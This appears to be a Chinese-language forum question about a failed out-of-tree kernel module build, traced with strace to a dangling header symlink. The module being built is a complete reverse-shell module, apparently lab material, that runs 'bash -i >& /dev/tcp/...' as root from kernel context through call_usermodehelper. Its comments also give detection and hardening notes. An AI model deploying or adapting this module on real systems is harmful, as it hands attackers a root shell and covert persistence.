我有一个简单的内核模块,可以创建反向 shell。
我这样创建了我的 Makefile:
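# Generate a kbuild Makefile for the out-of-tree module named by
# ${module_name} (expanded here, when the file is generated).
#
# The kernel release and the module directory are left for make to resolve
# each time it runs. An unquoted here-document expands $(uname -r) and $(pwd)
# in the shell, which freezes whatever kernel and directory were current when
# the file was written; the Makefile then silently points at the wrong place
# if it is copied or the kernel changes.
# Recipe lines must begin with a TAB; printf's \t keeps that explicit even if
# the script is pasted through something that mangles whitespace.
# shellcheck disable=SC2016 — the $(...) below are make syntax, not shell.
kbuild='$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(CURDIR)'
{
  printf 'obj-m += %s.o\n' "${module_name}"
  printf 'all:\n\t%s modules\n' "${kbuild}"
  printf 'clean:\n\t%s clean\n' "${kbuild}"
} > Makefile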
但是当我运行 make 命令时,它失败了:
root@ubuntu:~/moduletest# make
make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev modules
make[1]: Entering directory '/usr/src/linux-headers-5.4.0-1045-aws'
make[1]: Makefile: No such file or directory
make[1]: *** No rule to make target 'Makefile'. Stop.
make[1]: Leaving directory '/usr/src/linux-headers-5.4.0-1045-aws'
Makefile:3: recipe for target 'all' failed
make: *** [all] Error 2
我检查了该文件夹:
/lib/modules/5.4.0-1045-aws/build
但它似乎是一个引用其他符号链接的符号链接:
/lib/modules/5.4.0-1045-aws/build -> /usr/src/linux-headers-5.4.0-1045-aws -> ../linux-aws-headers-5.4.0-1045/Makefile
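最后一个链接目标 ../linux-aws-headers-5.4.0-1045/Makefile 对应的实际文件是:
/usr/src/linux-aws-5.4-headers-5.4.0-1045/Makefile
(注意:链接目标中的目录名是 linux-aws-headers-5.4.0-1045,而实际存在的目录名是 linux-aws-5.4-headers-5.4.0-1045,两者并不相同。如果前一个目录不存在,这个符号链接就是悬空链接,这与下文 strace 中 openat 对 "Makefile" 返回 ENOENT 的现象一致。可以用 ls -lL 或 readlink -e 检查该链接能否被解析。)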
为什么 make 命令无法访问这些链接?
资源:
我的内核模块:
#include <linux/kmod.h>
#include <linux/module.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("AttackDefense");
MODULE_DESCRIPTION("LKM reverse shell module");
MODULE_VERSION("1.0");
/*
 * Argument vector for the user-space helper: /bin/bash -c <command>. The
 * command attaches an interactive bash to a TCP connection to 127.0.0.1:8000
 * (loopback) through bash's /dev/tcp redirection.
 * NOTE(review): unlike envp below, argv is not declared static, so it has
 * external linkage under a very generic name.
 */
char* argv[] = {"/bin/bash","-c","bash -i >& /dev/tcp/127.0.0.1/8000 0>&1", NULL};
/* Environment handed to the helper: only PATH is set. */
static char* envp[] = {"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL };
/*
 * Module init hook: asks the kernel to start the user-space program described
 * by argv/envp through call_usermodehelper() and returns that call's status,
 * so a negative status makes the module load fail.
 * UMH_WAIT_EXEC waits only until the helper has been exec'd, not until it
 * exits.
 *
 * Detection note: the helper is started from kernel context rather than from
 * a login session, typically with root credentials. A shell whose parent is a
 * kernel thread, or an unexpected module-load event, is therefore worth
 * alerting on. Enforcing module signatures or setting kernel.modules_disabled
 * restricts who can load code like this.
 */
static int __init bobo_init(void) {
    int status = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);

    return status;
}
/*
 * Module exit hook: intentionally empty. Nothing here tracks or terminates
 * the helper process started by bobo_init, so unloading the module leaves
 * that process untouched.
 */
static void __exit bobo_exit(void) {
}
/* Register the entry points the kernel calls on module load and unload. */
module_init(bobo_init);
module_exit(bobo_exit);
变量展开后生成的 Makefile:
# Makefile as generated by the here-document, i.e. after the shell expanded
# ${module_name}, $(uname -r) and $(pwd).
# -C switches make into the kernel build tree; M= tells kbuild where the
# external module's source lives.
# NOTE(review): M= is frozen to /dev/shm/rev, while the make transcript prompt
# and the strace getcwd() show make being run from ~/moduletest — confirm the
# module source really is in /dev/shm/rev.
# NOTE(review): recipe lines must start with a TAB in the real file; the
# leading whitespace appears to have been lost in this listing.
obj-m +=bobo.o
all:
make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev modules
clean:
make -C /lib/modules/5.4.0-1045-aws/build M=/dev/shm/rev clean
使用 Strace 进行调试:
我运行测试:
strace -f -yy -q -e trace=%file -o make.strace make
以下是它搜索但未找到的日志:
15770 getcwd("/home/ubuntu/moduletest", 4096) = 24
15770 chdir("/lib/modules/5.4.0-1045-aws/build") = 0
15770 stat("/usr/include", {st_mode=S_IFDIR|0755, st_size=16384, ...}) = 0
15770 stat("/usr/gnu/include", 0x7ffc9d9319c0) = -1 ENOENT (No such file or directory)
15770 stat("/usr/local/include", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
15770 stat("/usr/include", {st_mode=S_IFDIR|0755, st_size=16384, ...}) = 0
15770 getcwd("/usr/src/linux-headers-5.4.0-1045-aws", 4096) = 38
15770 stat(".", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
15770 openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3</usr/src/linux-headers-5.4.0-1045-aws>
15770 openat(AT_FDCWD, "Makefile", O_RDONLY) = -1 ENOENT (No such file or directory)
使用 Strace -v 进行调试:
16954 getcwd("/home/ubuntu/moduletest", 4096) = 24
16954 chdir("/lib/modules/5.4.0-1045-aws/build") = 0
16954 stat("/usr/include", {st_dev=makedev(202, 1), st_ino=4731, st_mode=S_IFDIR|0755, st_nlink=33, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=32, st_size=16384, st_atime=1578850669 /* 2020-01-12T17:37:49.317948774+0000 */, st_atime_nsec=317948774, st_mtime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_mtime_nsec=734597829, st_ctime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_ctime_nsec=734597829}) = 0
16954 stat("/usr/gnu/include", 0x7ffeeaeac360) = -1 ENOENT (No such file or directory)
16954 stat("/usr/local/include", {st_dev=makedev(202, 1), st_ino=80156, st_mode=S_IFDIR|0755, st_nlink=2, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1578850475 /* 2020-01-12T17:34:35.054101307+0000 */, st_atime_nsec=54101307, st_mtime=1578850402 /* 2020-01-12T17:33:22.535948295+0000 */, st_mtime_nsec=535948295, st_ctime=1578850748 /* 2020-01-12T17:39:08.492615551+0000 */, st_ctime_nsec=492615551}) = 0
16954 stat("/usr/include", {st_dev=makedev(202, 1), st_ino=4731, st_mode=S_IFDIR|0755, st_nlink=33, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=32, st_size=16384, st_atime=1578850669 /* 2020-01-12T17:37:49.317948774+0000 */, st_atime_nsec=317948774, st_mtime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_mtime_nsec=734597829, st_ctime=1611729632 /* 2021-01-27T06:40:32.734597829+0000 */, st_ctime_nsec=734597829}) = 0
16954 getcwd("/usr/src/linux-headers-5.4.0-1045-aws", 4096) = 38
16954 stat(".", {st_dev=makedev(202, 1), st_ino=1117295, st_mode=S_IFDIR|0755, st_nlink=7, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1644324103 /* 2022-02-08T12:41:43.401883198+0000 */, st_atime_nsec=401883198, st_mtime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_mtime_nsec=297502175, st_ctime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_ctime_nsec=297502175}) = 0
16954 openat(AT_FDCWD, ".", O_RDONLY|O_NONBLOCK|O_CLOEXEC|O_DIRECTORY) = 3</usr/src/linux-headers-5.4.0-1045-aws>
16954 openat(AT_FDCWD, "Makefile", O_RDONLY) = -1 ENOENT (No such file or directory)
16954 openat(AT_FDCWD, "/usr/share/locale/C.UTF-8/LC_MESSAGES/libc.mo", O_RDONLY) = -1 ENOENT (No such file or directory)
我运行了以下命令:
root@ubuntu:~/moduletest# ls -ldi /usr/src/linux-headers-5.4.0-1045-aws/Makefile
1147184 lrwxrwxrwx 1 root root 40 Apr 13 2021 /usr/src/linux-headers-5.4.0-1045-aws/Makefile -> ../linux-aws-headers-5.4.0-1045/Makefile
root@ubuntu:~# ls -ldi /usr/src/linux-headers-5.4.0-1045-aws
1117295 drwxr-xr-x 7 root root 4096 Feb 7 09:28 /usr/src/linux-headers-5.4.0-1045-aws
root@ubuntu:~/moduletest# cat make.strace | grep 7295
16954 stat(".", {st_dev=makedev(202, 1), st_ino=1117295, st_mode=S_IFDIR|0755, st_nlink=7, st_uid=0, st_gid=0, st_blksize=4096, st_blocks=8, st_size=4096, st_atime=1644324103 /* 2022-02-08T12:41:43.401883198+0000 */, st_atime_nsec=401883198, st_mtime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_mtime_nsec=297502175, st_ctime=1644226137 /* 2022-02-07T09:28:57.297502175+0000 */, st_ctime_nsec=297502175}) = 0
root@ip-172-31-23-181:~/moduletest#